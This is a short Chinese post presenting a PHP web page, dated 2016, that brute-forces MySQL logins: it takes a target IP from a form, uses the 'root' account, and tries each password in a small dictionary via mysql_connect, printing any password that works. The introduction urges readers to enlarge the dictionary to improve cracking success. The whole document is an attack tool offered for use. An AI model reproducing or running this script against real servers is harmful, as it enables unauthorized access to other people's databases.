Mysql PHP版本爆破小脚本
(注意:从代码可以看出用户名是个变量,一般数据库账号不会变,所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展,破解的成功与失败,就看你扩展的字典强大不强大了。用法:保存代码为MysqlDatabaseBlasting.php,浏览器打开就可使用。 )
?
/* * author:Bearcat 2016-10-5 */ <html> <head> <title>Mysql账号密码爆破工具</title> <meta http-equiv= "Content-Type" content= "text/html; charset=utf-8" > </head> <body> <center> <br><br> <h1>MysqlDatabaseBlasting(Mysql账号密码在线爆破工具 V1.0)</h1> <br> <?php if (@ $_POST [ 'submit' ]){ $host = @ $_POST [ 'host' ]; if ( $host != "" ){ $username = "root" ; //用户名字典 $password = array ( '' , '123456' , 'admin' , 'root' , 'ccf304vn' ); //密码字典 echo "<hr><br>--------------------爆破状态--------------------<br>" ; echo "密码错误次数:" ; for ( $i =0; $i <= count ( $password ); $i ++) { if (@mysql_connect( $host , $username , $password [ $i ])){ echo "<br><br><font color='red'>爆破成功--密码-->" .@ $password [ $i ]. "</font>" ; break ; } else { echo $i . "、" ; continue ; } } echo "<br>--------------------爆破结束--------------------<br><hr>" ; } else { echo "<script>alert('黑客,输入数据库IP地址')</script>" ; } } ?> <br><br><br><br> <form action= "MysqlDatabaseBlasting.php" method= "post" > 数据库IP地址:<input type= "text" name= "host" /> <input type= "submit" value= "爆破" name= "submit" /> </form> <center> </body> </html> |